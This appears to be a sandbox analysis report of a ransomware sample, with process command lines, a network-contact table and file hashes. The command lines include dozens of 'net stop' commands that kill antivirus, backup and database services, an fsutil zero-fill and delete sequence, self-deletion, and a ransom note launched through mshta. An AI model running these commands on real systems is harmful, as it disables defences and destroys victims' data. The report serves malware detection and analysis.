C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | live.sysinternals.com | udp |
| GB | 20.49.223.105:80 | live.sysinternals.com | tcp |
| N/A | 10.10.0.255:3 | | udp |
| N/A | 10.10.0.255:3 | | udp |
| N/A | 10.10.0.255:3 | | udp |
| NL | 154.61.71.255:3 | | udp |
| N/A | 224.0.0.255:3 | | udp |
| N/A | 224.0.0.255:3 | | udp |
| N/A | 239.255.255.255:3 | | udp |
| N/A | 255.255.255.255:3 | | udp |
| N/A | 239.255.255.250:3702 | | udp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.22.18.188:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | prometheusstat.in | udp |
| US | 8.8.8.8:53 | info.prometheusgroup.com | udp |
| US | 8.8.8.8:53 | www.imgurupload.com | udp |
| US | 199.60.103.254:443 | info.prometheusgroup.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| N/A | 239.255.255.250:3702 | | udp |
Files
memory/744-114-0x0000000000530000-0x0000000000531000-memory.dmp
memory/744-116-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
memory/744-117-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
memory/3776-118-0x0000000000000000-mapping.dmp
memory/960-120-0x0000000000000000-mapping.dmp
memory/2308-119-0x0000000000000000-mapping.dmp
memory/708-121-0x0000000000000000-mapping.dmp
memory/1368-122-0x0000000000000000-mapping.dmp
memory/2084-123-0x0000000000000000-mapping.dmp
memory/3044-125-0x0000000000000000-mapping.dmp
memory/3656-124-0x0000000000000000-mapping.dmp
memory/2504-126-0x0000000000000000-mapping.dmp
memory/2024-128-0x0000000000000000-mapping.dmp
memory/3796-127-0x0000000000000000-mapping.dmp
memory/1036-130-0x0000000000000000-mapping.dmp
memory/1296-131-0x0000000000000000-mapping.dmp
memory/2712-132-0x0000000000000000-mapping.dmp
memory/3064-133-0x0000000000000000-mapping.dmp
memory/4088-129-0x0000000000000000-mapping.dmp
memory/3920-134-0x0000000000000000-mapping.dmp
memory/3068-135-0x0000000000000000-mapping.dmp
memory/2220-136-0x0000000000000000-mapping.dmp
memory/2616-137-0x0000000000000000-mapping.dmp
memory/3868-140-0x0000000000000000-mapping.dmp
memory/3852-142-0x0000000000000000-mapping.dmp
memory/1204-144-0x0000000000000000-mapping.dmp
memory/4092-145-0x0000000000000000-mapping.dmp
memory/4140-148-0x0000000000000000-mapping.dmp
memory/4296-154-0x0000000000000000-mapping.dmp
memory/4268-153-0x0000000000000000-mapping.dmp
memory/4244-152-0x0000000000000000-mapping.dmp
memory/4224-151-0x0000000000000000-mapping.dmp
memory/4200-150-0x0000000000000000-mapping.dmp
memory/4400-157-0x0000000000000000-mapping.dmp
memory/4356-156-0x0000000000000000-mapping.dmp
memory/4344-155-0x0000000000000000-mapping.dmp
memory/4532-160-0x0000000000000000-mapping.dmp
memory/4548-161-0x0000000000000000-mapping.dmp
memory/4708-167-0x0000000000000000-mapping.dmp
memory/4796-170-0x0000000000000000-mapping.dmp
memory/4896-173-0x0000000000000000-mapping.dmp
memory/4848-172-0x0000000000000000-mapping.dmp
memory/5012-177-0x0000000000000000-mapping.dmp
memory/5076-178-0x0000000000000000-mapping.dmp
memory/10412-185-0x0000000004CB0000-0x0000000004CB1000-memory.dmp
memory/10412-188-0x00000000072C2000-0x00000000072C3000-memory.dmp
memory/10412-187-0x00000000072C0000-0x00000000072C1000-memory.dmp
memory/10412-186-0x0000000007900000-0x0000000007901000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
| MD5 | 3ba7dbb4ede0af8460784515c6eedf52 |
| SHA1 | b017e44311d752fd4ffe1642e44d3cc0a5f783a8 |
| SHA256 | 437e29d7e40ad47e3f3be67610005fc1cc9b515778ad2898b6143fa670fb57e4 |
| SHA512 | 33dcb55d05038f2d96e6820d736590453dca59c30449486510cb88f2393616fd8c58c6639fecbe0156aebb1a9d88bd699d1a679bcd84e00b3ea08970e11b0ae9 |
memory/15676-193-0x0000000004D60000-0x0000000004D61000-memory.dmp
memory/15676-194-0x0000000004D62000-0x0000000004D63000-memory.dmp
memory/15676-195-0x00000000076F0000-0x00000000076F1000-memory.dmp
memory/10412-197-0x0000000007780000-0x0000000007781000-memory.dmp
memory/10412-201-0x0000000008090000-0x0000000008091000-memory.dmp
memory/4156-181-0x0000000000000000-mapping.dmp
memory/5108-179-0x0000000000000000-mapping.dmp
memory/3984-180-0x0000000000000000-mapping.dmp
memory/4952-175-0x0000000000000000-mapping.dmp
memory/4980-176-0x0000000000000000-mapping.dmp
memory/4932-174-0x0000000000000000-mapping.dmp
memory/4836-171-0x0000000000000000-mapping.dmp
memory/4784-169-0x0000000000000000-mapping.dmp
memory/4748-168-0x0000000000000000-mapping.dmp
memory/4684-166-0x0000000000000000-mapping.dmp
memory/4648-165-0x0000000000000000-mapping.dmp
memory/4624-164-0x0000000000000000-mapping.dmp
memory/4592-163-0x0000000000000000-mapping.dmp
memory/4560-162-0x0000000000000000-mapping.dmp
memory/4488-159-0x0000000000000000-mapping.dmp
memory/4464-158-0x0000000000000000-mapping.dmp
memory/4160-149-0x0000000000000000-mapping.dmp
memory/4100-146-0x0000000000000000-mapping.dmp
memory/4124-147-0x0000000000000000-mapping.dmp
memory/2556-143-0x0000000000000000-mapping.dmp
memory/3860-141-0x0000000000000000-mapping.dmp
memory/3236-139-0x0000000000000000-mapping.dmp
memory/1184-138-0x0000000000000000-mapping.dmp
memory/15676-203-0x0000000008020000-0x0000000008021000-memory.dmp
memory/15676-205-0x00000000087F0000-0x00000000087F1000-memory.dmp
memory/15676-207-0x0000000008840000-0x0000000008841000-memory.dmp
memory/15676-226-0x0000000009560000-0x0000000009593000-memory.dmp
memory/15676-234-0x0000000009500000-0x0000000009501000-memory.dmp
memory/10412-236-0x00000000072C3000-0x00000000072C4000-memory.dmp
memory/15676-237-0x000000007E470000-0x000000007E471000-memory.dmp
memory/15676-241-0x0000000009690000-0x0000000009691000-memory.dmp
memory/15676-250-0x0000000004D63000-0x0000000004D64000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4bee6764158395ff4b8338d85a791fec |
| SHA1 | 95a27d8fb90f9a6f1a0249024031bbd12f70a6cc |
| SHA256 | 597d2a3c92b0baadaeb50d970bef99507134d632a1926a6ac708b55c0f7af91d |
| SHA512 | ab08040bef2fc96bd9a9c4f5f471259033641114d80bbb9f439fc9fe6b3f37ba6cb65d1a9f216739b9f0906d1bf9ee615221b058f5e04666767aa4ebf15e9927 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 0f5cbdca905beb13bebdcf43fb0716bd |
| SHA1 | 9e136131389fde83297267faf6c651d420671b3f |
| SHA256 | a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060 |
| SHA512 | a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0 |
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | 5b5092d4170180c338caaabcaff6ba72 |
| SHA1 | 7c93ef3b4195d1cf0cfb69c66b3f91587ad6e58d |
| SHA256 | 6b9a63a13de9fe2046759a2c7ab6c3ddb42fcea9f78de029b0cd1bc9756d130e |
| SHA512 | f9a3926344ed6292be1c53c1d3fa0669b0de4af2228b1f0910e510bb2cc3f3557ea8f7a0a84160770660278996bc18a7b19a3e451de3ba92a6e03bc02f39b0bf |